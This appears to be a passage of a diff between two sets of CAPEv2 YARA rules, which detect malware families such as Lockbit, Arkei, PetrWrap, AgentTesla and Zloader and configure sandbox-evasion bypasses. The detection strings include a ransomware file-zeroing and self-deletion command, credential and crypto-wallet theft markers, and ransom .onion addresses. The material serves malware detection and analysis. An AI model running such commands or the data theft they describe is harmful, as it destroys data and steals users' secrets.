+		$sha256 = {98 2F 8A 42 91 44 37 71 CF FB C0 B5 A5 DB B5 E9}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Badrabbit : FILE
+rule CAPE_Lockbit : FILE
 {
 	meta:
-		description = "BadRabbit Payload"
+		description = "Lockbit Payload"
 		author = "kevoreilly"
-		id = "c7204772-6f14-57b7-88c1-e9156f9897d5"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "ec9b4fec-0233-5277-b922-07057c2b4b34"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BadRabbit.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "309e14ab4ea2f919358631f9d8b2aaff1f51e7708b6114e4e6bf4a9d9a5fc86c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Lockbit.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "80ab705c8246a0bd5b3de65146cf32b102f39bf9444bdf1d366b5a794c1229b9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "BadRabbit Payload"
+		cape_type = "Lockbit Payload"
 
 	strings:
-		$a1 = "caforssztxqzf2nm.onion" wide
-		$a2 = "schtasks /Create /SC once /TN drogon /RU SYSTEM" wide
-		$a3 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal" wide
+		$string1 = "/C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" wide
+		$string2 = "Ransom" ascii wide
+		$crypto = {8B 4D 08 C1 E9 10 0F B6 D1 8B 4D 0C C1 E9 08 0F B6 C9 8B 14 95 [4] 8B 7D FC 33 14 8D [4] 8B CF C1 E9 18 33 14 8D [4] 0F B6 CB 33 14 8D [4] 8B CF 33 10}
+		$decode1 = {8A ?4 34 ?C 0? 00 00 8B 8? 24 ?8 0? 00 00 0F BE ?? 0F BE C? 33 ?? 88 ?? 34 ?? 0? 00 00 46 83 FE 0? 72 DD}
+		$decode2 = {8A 44 24 ?? 30 44 0C ?? 41 83 F9 ?? 72 F2}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and ( 2 of them )
 }
-rule CAPE_Latrodectus_1
+rule CAPE_Arkei : FILE
 {
 	meta:
-		description = "Latrodectus Payload"
-		author = "enzok"
-		id = "956b6736-b3ef-5974-b3dd-02d04336dbe8"
-		date = "2025-05-10"
-		modified = "2025-05-10"
+		description = "Arkei Payload"
+		author = "kevoreilly, YungBinary"
+		id = "18363a5b-46f3-5d11-9bc6-a91f81b49706"
+		date = "2025-01-10"
+		modified = "2025-01-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Latrodectus.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "a547cff9991a713535e5c128a0711ca68acf9298cc2220c4ea0685d580f36811"
-		logic_hash = "a8430299930f4c8de0a88c6836d4821871f7183cc5ff44ea9be84fbea47bbb13"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Arkei.yar#L1-L50"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "296e420880d8d2f24424d0411e7ef4939e18147689557512f410da48498a44c9"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Latrodectus Payload"
+		tags = "FILE"
+		cape_type = "Arkei Payload"
 
 	strings:
-		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
-		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
-		$procchk1 = {E8 [3] FF 85 C0 74 [2] FF FF FF FF E9 [4] E8 [4] 89 44 24 ?? E8 [4] 83 F8 4B 73 ?? 83 [3] 06}
-		$procchk2 = {72 [2] FF FF FF FF E9 [4] E8 [4] 83 F8 32 73 ?? 83 [3] 06}
-		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
+		$string1 = "Windows_Antimalware_Host_System_Worker"
+		$string2 = "Arkei"
+		$string3 = "Bitcoin\\wallet.dat"
+		$string4 = "Ethereum\\keystore"
+		$v1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
+		$v2 = "/c taskkill /im " fullword ascii
+		$v3 = "card_number_encrypted FROM credit_cards" ascii
+		$v4 = "\\wallet.dat" ascii
+		$v5 = "Arkei/" wide
+		$v6 = "files\\passwords." ascii wide
+		$v7 = "files\\cc_" ascii wide
+		$v8 = "files\\autofill_" ascii wide
+		$v9 = "files\\cookies_" ascii wide
+		$loaded_modules = {
+            64 A1 30 00 00 00
+            8B 40 0C
+            8B 40 0C
+            8B 00
+            8B 00
+            8B 40 18
+            89 45 FC
+            8B 45 FC
+            8B E5
+            5D
+            C3
+        }
+		$language_check = {
+            FF 15 ?? ?? ?? ??
+            0F B7 C0
+            89 45 ??
+            81 7D ?? 3F 04 ?? ??
+            7F
+        }
+		$ext1 = ".zoo" ascii
+		$ext2 = ".arc" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and ( ( $loaded_modules and $language_check and $ext1 and $ext2 ) or ( all of ( $string* ) or 7 of ( $v* ) ) )
 }
-rule CAPE_Latrodectus_AES
+rule CAPE_Petrwrap : FILE
 {
 	meta:
-		description = "Latrodectus Payload"
-		author = "enzok"
-		id = "16c295f5-cea0-57b5-b826-e1126e50c8cc"
-		date = "2025-05-10"
-		modified = "2025-05-10"
+		description = "PetrWrap Payload"
+		author = "kevoreilly"
+		id = "83762c87-6e96-50fe-b297-e1a5f893be43"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Latrodectus.yar#L18-L34"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "5cecb26a3f33c24b92a0c8f6f5175da0664b21d7c4216a41694e4a4cad233ca8"
-		logic_hash = "058d278c16527969066d1b4ea7f0e3ab2809d5480cdab06ec476b465e0c4795a"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/PetrWrap.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6dd1cf5639b63d0ab41b24080dad68d285f2e3969ad34fd724c83e7a0dd4b968"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Latrodectus Payload"
+		tags = "FILE"
+		cape_type = "PetrWrap Payload"
 
 	strings:
-		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
-		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
-		$key = {C6 44 2? ?? ?? [150] C6 44 2? ?? ?? B8 02}
-		$aes_ctr_1 = {8B 44 24 ?? FF C8 89 44 24 ?? 83 7C 24 ?? 00 7C ?? 4? 63 44 24 ?? 4? 8B 4C 24 ?? 0F B6 84 01 F0 00 00 00 3D FF 00 00 00}
-		$aes_ctr_2 = {48 03 C8 48 8B C1 0F B6 ?? 48 63 4C 24 ?? 0F B6 4C 0C ?? 33 C1 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 03 D1 48 8B CA 88 01}
-		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
+		$a1 = "http://petya3jxfp2f7g3i.onion/"
+		$a2 = "http://petya3sen7dyko2n.onion"
+		$b1 = "http://mischapuk6hyrn72.onion/"
+		$b2 = "http://mischa5xyix2mrhd.onion/"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( any of ( $b* ) )
 }
-rule CAPE_Nanolocker : FILE
+rule CAPE_Stealcanti : FILE
 {
 	meta:
-		description = "NanoLocker Payload"
+		description = "Stealc detonation bypass"
 		author = "kevoreilly"
-		id = "6fff6a27-a153-5461-9a75-2253c2f7d408"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "32e5c1cf-ef57-58eb-9deb-fab0064cc676"
+		date = "2024-01-19"
+		modified = "2024-01-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/NanoLocker.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "fe6c8a4e259c3c526f8f50771251f6762b2b92a4df2e8bfc705f282489f757db"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Stealc.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
+		logic_hash = "4132e8094b0b49a89e9f40a8b1a6abbf105bbb04e4ddf3ce739e39fc2baf0d13"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "NanoLocker Payload"
+		cape_options = "bp0=$anti+17,action0=skip,count=1"
 
 	strings:
-		$a1 = "NanoLocker"
-		$a2 = "$humanDeadline"
-		$a3 = "Decryptor.lnk"
+		$anti = {53 57 57 57 FF 15 [4] 8B F0 74 03 75 01 B8 E8 [4] 74 03 75 01 B8}
+		$decode = {6A 03 33 D2 8B F8 59 F7 F1 8B C7 85 D2 74 04 2B C2 03 C1 6A 06 C1 E0 03 33 D2 59 F7 F1}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Ursnifv3_1 : FILE
+rule CAPE_Stealcstrings : FILE
 {
 	meta:
-		description = "UrsnifV3 Payload"
+		description = "Stealc string decryption"
 		author = "kevoreilly"
-		id = "9dd32f80-b535-52a3-91e1-4db005362fd4"
-		date = "2023-03-23"
-		modified = "2023-03-23"
+		id = "087b5532-e1e7-5df9-adb2-bf758c8ba352"
+		date = "2024-01-19"
+		modified = "2024-01-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/UrsnifV3.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "501cd52388aba16f9d33b4555f310e1ad58326916b15358a485c701acb87abd8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Stealc.yar#L15-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6d402446a979c00b6257ace9924db381d98c530b22968bd2776c66d58c7faefc"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "UrsnifV3 Payload"
-		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
-		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
+		cape_options = "bp0=$decode+17,action0=string:edx,count=1,typestring=Stealc Strings"
+		packed = "d0c824e886f14b8c411940a07dc133012b9eed74901b156233ac4cac23378add"
 
 	strings:
-		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
-		$crypto32_2 = {8B 45 ?? 0F B6 3? FF 45 [2-4] 8B C? 23 C? 40 40 D1 E? 7?}
-		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [10-12] 74 ?? F6 46 03 01 74}
-		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4? 10 [12] 8B [2] 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
-		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
-		$cape_string = "cape_options"
+		$decode = {51 8B 15 [4] 52 8B 45 ?? 50 E8 [4] 83 C4 0C 6A 04 6A 00 8D 4D ?? 51 FF 15 [4] 83 C4 0C 8B 45 ?? 8B E5 5D C3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $crypto32_* ) and $cpuid and not $cape_string
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Amadey : FILE
+rule CAPE_Dridexloader_1 : FILE
 {
 	meta:
-		description = "Amadey Payload"
+		description = "DridexLoader API Spam Bypass"
 		author = "kevoreilly"
-		id = "b9d81aa8-5504-5b71-86c7-8c00d75479ad"
-		date = "2023-09-04"
-		modified = "2023-09-04"
+		id = "a8b62f64-87a0-58d3-8876-9b0f6a7deb97"
+		date = "2021-03-09"
+		modified = "2021-03-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Amadey.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "988258716d5296c1323303e8fe4efd7f4642c87bfdbe970fe9a3bb3f410f70a4"
-		logic_hash = "38f710b422a3644c9f0f3e80ad9ff28ef02050368c651a6cc2ce8b152b67bf48"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/DridexLoader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "00a3e4e80a2558ee52035f091e2339fa2dad6f6515b9dc099f2f3800e4c70bce"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Amadey Payload"
+		cape_options = "bp0=$trap-13,action0=ret,count=0"
 
 	strings:
-		$decode1 = {8B D1 B8 FF FF FF 7F D1 EA 2B C2 3B C8 76 07 BB FF FF FF 7F EB 08 8D 04 0A 3B D8 0F 42 D8}
-		$decode2 = {33 D2 8B 4D ?? 8B C7 F7 F6 8A 84 3B [4] 2A 44 0A 01 88 87 [4] 47 8B 45 ?? 8D 50 01}
-		$decode3 = {8A 04 02 88 04 0F 41 8B 7D ?? 8D 42 01 3B CB 7C}
+		$trap = {6A 50 6A 14 6A 03 5A 8D 4C 24 ?? E8 [4] 68 [4] 68 [4] E8 [4] 85 C0 74 05}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and $trap
 }
-rule CAPE_Zeuspanda : FILE
+rule CAPE_Rdtscpantivm
 {
 	meta:
-		description = "ZeusPanda Payload"
+		description = "RdtscpAntiVM bypass"
 		author = "kevoreilly"
-		id = "7891c021-6687-5457-b9e1-0beb0472647c"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "11dc634b-1e2f-55b4-be60-98e51de42d43"
+		date = "2021-12-11"
+		modified = "2021-12-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/ZeusPanda.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "43d8a56cae9fd23c053f6956851734d3270b46a906236854502c136e3bb1e761"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/RdtscpAntiVM.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "be0f9b52fb630730a38160f4ad2d50b6b4bea5edd82e3ea4d1e257cf7b090910"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "ZeusPanda Payload"
+		tags = ""
+		cape_options = "nop-rdtscp=1"
 
 	strings:
-		$code1 = {8B 01 57 55 55 55 55 55 55 53 51 FF 50 0C 85 C0 78 E? 55 55 6A 03 6A 03 55 55 6A 0A FF 37}
-		$code2 = {8D 85 B0 FD FF FF 50 68 ?? ?? ?? ?? 8D 85 90 FA FF FF 68 0E 01 00 00 50 E8 ?? ?? ?? ?? 83 C4 10 83 F8 FF 7E ?? 68 04 01 00 00 8D 85 B0 FD FF FF}
+		$antivm = {46 0F 01 F9 [0-4] 66 0F 6E C6 F3 0F E6 C0 66 0F 2F ?? 73}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		any of them
 }
-rule CAPE_Remcos : FILE
+rule CAPE_Privateloader
 {
 	meta:
-		description = "Remcos Payload"
+		description = "PrivateLoader indirect syscall capture"
 		author = "kevoreilly"
-		id = "f77295ca-02d5-5b2c-80b8-b6566610bff8"
-		date = "2022-05-10"
-		modified = "2022-05-10"
+		id = "3a0b16da-ec84-5761-bcf2-106362c5667d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Remcos.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "38142e784ad437d9592353b924f74777bb62e5ed176c811230a2021a437d4710"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/PrivateLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "204a86bb3743f19fed0fe55ff5ccd716661f7f315b5966a29e434ccb3e160526"
 		score = 75
-		quality = 68
-		tags = "FILE"
-		cape_type = "Remcos Payload"
+		quality = 70
+		tags = ""
+		cape_options = "clear,sysbp=$syscall*-2"
+		packed = "075d0dafd7b794fbabaf53d38895cfd7cffed4a3fe093b0fc7853f3b3ce642a4"
 
 	strings:
-		$name = "Remcos" nocase
-		$time = "%02i:%02i:%02i:%03i"
-		$crypto1 = {81 E1 FF 00 00 80 79 ?? 4? 81 C9 00 FF FF FF 4? 8A ?4 8?}
-		$crypto2 = {0F B6 [1-7] 8B 45 08 [0-2] 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 ?? ?? FF FF 30 06 47 3B 7D 0C 72}
+		$syscall = {48 31 C0 4C 8B 19 8B 41 10 48 8B 49 08 49 89 CA 41 FF E3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $name ) and ( $time ) and any of ( $crypto* )
+		any of them
 }
-rule CAPE_Agent_Tesla
+rule CAPE_Mysterysnail
 {
 	meta:
-		description = "Detecting HTML strings used by Agent Tesla malware"
-		author = "Stormshield"
-		id = "5383994b-357d-539b-89b1-53be238f759d"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		description = "MysterySnail anti-sandbox bypass"
+		author = "kevoreilly"
+		id = "dfeb820a-3101-5588-8348-3b62a6900538"
+		date = "2021-10-16"
+		modified = "2021-10-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AgentTesla.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "3945754129dcc58e0abfd7485f5ff0c0afdd1078ae2cf164ca8f59a6f79db1be"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/MysterySnail.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "9402dbbbfdd286e2309ee83fc08194f70f73657a3a4e3785dfbcb564dbee86a8"
 		score = 75
 		quality = 70
 		tags = ""
-		version = "1.0"
+		cape_options = "bp0=$anti+62,action0=skip,count=0"
 
 	strings:
-		$html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
-		$html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
-		$html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " wide ascii
-		$html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " wide ascii
-		$html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" wide ascii
+		$anti = {F2 0F 10 [3] 66 0F 2F 05 [4] 76 0A 8B [3] FF C0 89 [3] B9 5B 05 00 00 FF 15 [4] E8 [4] 89 [3] 8B [3] 8B [3] 2B C8 8B C1 3B [3] 7E 16}
 
 	condition:
-		3 of them
+		any of them
 }
-rule CAPE_Agenttesla : FILE
+rule CAPE_Zloader_1 : FILE
 {
 	meta:
-		description = "AgentTesla Payload"
+		description = "Zloader API Spam Bypass"
 		author = "kevoreilly"
-		id = "f7b930f1-cecb-5d80-809b-9503f282247a"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		id = "8a8e7102-1138-59e7-95a6-8647d41d8521"
+		date = "2024-05-03"
+		modified = "2024-05-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AgentTesla.yar#L19-L41"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "1bf9b26c4cf87e674ddffabe40aba5a45499c6a04d4ff3e43c3cda4cbcb4d188"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Zloader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "319adca805083c7f5854fe840447cf961addbd748f1f25eb8ec8cdeed7af38aa"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "AgentTesla Payload"
+		cape_options = "bp0=$trap1-5,action0=hooks:0,bp1=$traps-108,action1=jmp:15,bp2=$traps-88,action2=hooks:1,count=0"
 
 	strings:
-		$string1 = "smtp" wide
-		$string2 = "appdata" wide
-		$string3 = "76487-337-8429955-22614" wide
-		$string4 = "yyyy-MM-dd HH:mm:ss" wide
-		$string6 = "webpanel" wide
-		$string7 = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:" wide
-		$string8 = "<br>IP Address&nbsp;&nbsp;:" wide
-		$agt1 = "IELibrary.dll" ascii
-		$agt2 = "C:\\Users\\Admin\\Desktop\\IELibrary\\IELibrary\\obj\\Debug\\IELibrary.pdb" ascii
-		$agt3 = "GetSavedPasswords" ascii
-		$agt4 = "GetSavedCookies" ascii
+		$trap1 = {81 F7 4C 01 00 00 8D B4 37 [2] FF FF 31 FE 69 FE 95 03 00 00 E8 [4] 31 FE 0F AF FE 0F AF FE E8}
+		$traps = {6A 44 53 E8 [2] FF FF 83 C4 08 8D 85 ?? FF FF FF C7 85 ?? FF FF FF 44 00 00 00 50}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $string* ) or 3 of ( $agt* ) )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Agentteslav2 : FILE
+rule CAPE_Zloader_2024 : FILE
 {
 	meta:
-		description = "AgenetTesla Type 2 Keylogger payload"
-		author = "ditekshen"
-		id = "e60ecee4-0a97-56a1-b21e-47190f8cd1f8"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		description = "Zloader Registry and Modulename Bypass"
+		author = "enzok"
+		id = "7100c27e-021f-552c-9a75-84b07a2f837e"
+		date = "2024-05-03"
+		modified = "2024-05-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AgentTesla.yar#L43-L67"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "b45296b3b94fa1ff32de48c94329a17402461fb6696e9390565c4dba9738ed78"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Zloader.yar#L14-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "38d555ef5f613cf7ca043697c479100a7a22e7f043acf8b6a46f8009eb92fd7e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "AgentTesla Payload"
+		cape_options = "bp0=$reg_1*+1,bp0=$reg_2*+1,action0=seteax:1,count=0"
 
 	strings:
-		$s1 = "get_kbHook" ascii
-		$s2 = "GetPrivateProfileString" ascii
-		$s3 = "get_OSFullName" ascii
-		$s4 = "get_PasswordHash" ascii
-		$s5 = "remove_Key" ascii
-		$s6 = "FtpWebRequest" ascii
-		$s7 = "logins" fullword wide
-		$s8 = "keylog" fullword wide
-		$s9 = "1.85 (Hash, version 2, native byte-order)" wide
-		$cl1 = "Postbox" fullword ascii
-		$cl2 = "BlackHawk" fullword ascii
-		$cl3 = "WaterFox" fullword ascii
-		$cl4 = "CyberFox" fullword ascii
-		$cl5 = "IceDragon" fullword ascii
-		$cl6 = "Thunderbird" fullword ascii
+		$reg_1 = {FF D0 83 F8 00 0F 94 C0 24 01 88 44 24 ?? 4? 8B [3] B? [9-25] E8 [4] 4? 89 F1 FF D0 8A [3] 24 01 0F B6 C0}
+		$reg_2 = {B9 [4] E8 [4] 8B [3] 89 C2 E8 [4] 4? [4] ff D0 8A [3] 24 01 0F B6 C0}
+		$name_1 = {56 5? 5? 4? 81 EC [4] C7 44 24 ?? 00 00 00 00 4? 8D 0D [4] E8 [4] 4? 89 [3] 4? 83 [3] 00 75}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 6 of ( $s* ) and 2 of ( $cl* ) )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Agentteslav3 : FILE
+rule CAPE_Bruteratelsyscall
 {
 	meta:
-		description = "AgentTeslaV3 infostealer payload"
-		author = "ditekshen"
-		id = "cfe00382-8663-54a4-a7c4-b932ec7ad5e3"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		description = "BruteRatel Syscall Bypass"
+		author = "kevoreilly"
+		id = "0ddc3e0a-c4ca-5342-b029-107ce1f2751e"
+		date = "2024-07-22"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/AgentTesla.yar#L69-L111"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "26c4fa0ce8de6982eb599f3872e8ab2a6e83da4741db7f3500c94e0a8fe5d459"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/BruteRatel.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5ed054b3cd5d2659c250945d55d6adac90945963c34ad2af0f8d7436141e86b6"
 		score = 75
-		quality = 68
-		tags = "FILE"
-		cape_type = "AgentTesla payload"
+		quality = 70
+		tags = ""
+		cape_options = "sysbp=$syscall1+6,sysbp=$syscall2+8"
 
 	strings:
-		$s1 = "get_kbok" fullword ascii
-		$s2 = "get_CHoo" fullword ascii
-		$s3 = "set_passwordIsSet" fullword ascii
-		$s4 = "get_enableLog" fullword ascii
